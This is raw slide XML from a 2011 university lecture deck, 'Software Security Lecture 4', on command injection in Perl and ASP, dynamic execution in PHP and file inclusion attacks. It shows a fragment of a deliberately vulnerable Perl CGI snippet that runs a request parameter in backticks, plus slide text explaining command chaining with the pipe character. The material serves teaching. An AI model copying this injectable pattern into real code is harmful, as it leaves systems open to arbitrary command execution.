              </a:rPr>
              <a:t>command.param</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(“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”);</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>$command=`$command`; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>print “$command\n”; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>print </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>end_html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/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0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521" y="375571"/>
            <a:ext cx="4946602" cy="4105275"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>When used as intended: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21" y="1630182"/>
            <a:ext cx="6823639" cy="4753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96" y="841956"/>
            <a:ext cx="4650666" cy="2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Injecting via Perl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“|” is used to redirect the output of a process to the input of another process</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>This enables multiple commands to be chained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64469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4812</TotalTime>
  <Words>1001</Words>
  <Application>Microsoft Macintosh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Inspiration</vt:lpstr>
      <vt:lpstr>Software Security Lecture 4</vt:lpstr>
      <vt:lpstr>Outline</vt:lpstr>
      <vt:lpstr>Injecting Code II</vt:lpstr>
      <vt:lpstr>Interpreted Languages</vt:lpstr>
      <vt:lpstr>Interpreted Languages</vt:lpstr>
      <vt:lpstr>Command Injection Attacks</vt:lpstr>
      <vt:lpstr>OS command: Injecting via Perl</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Injecting via Perl</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>OS Command: Injecting via ASP</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Dynamic Execution Vulnerabilities</vt:lpstr>
      <vt:lpstr>Dynamic execution in PHP</vt:lpstr>
      <vt:lpstr>File Inclusion Attacks</vt:lpstr>
      <vt:lpstr>File Inclusion Attacks</vt:lpstr>
      <vt:lpstr>Quiz</vt:lpstr>
      <vt:lpstr>Next week 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Security</dc:title>
  <dc:creator>Fang Yu</dc:creator>
  <cp:lastModifiedBy>Fang Yu</cp:lastModifiedBy>
  <cp:revision>63</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2011-02-21T14:47:34Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2011-03-22T00:36:18Z</dcterms:modified>
</cp:coreProperties>
</file>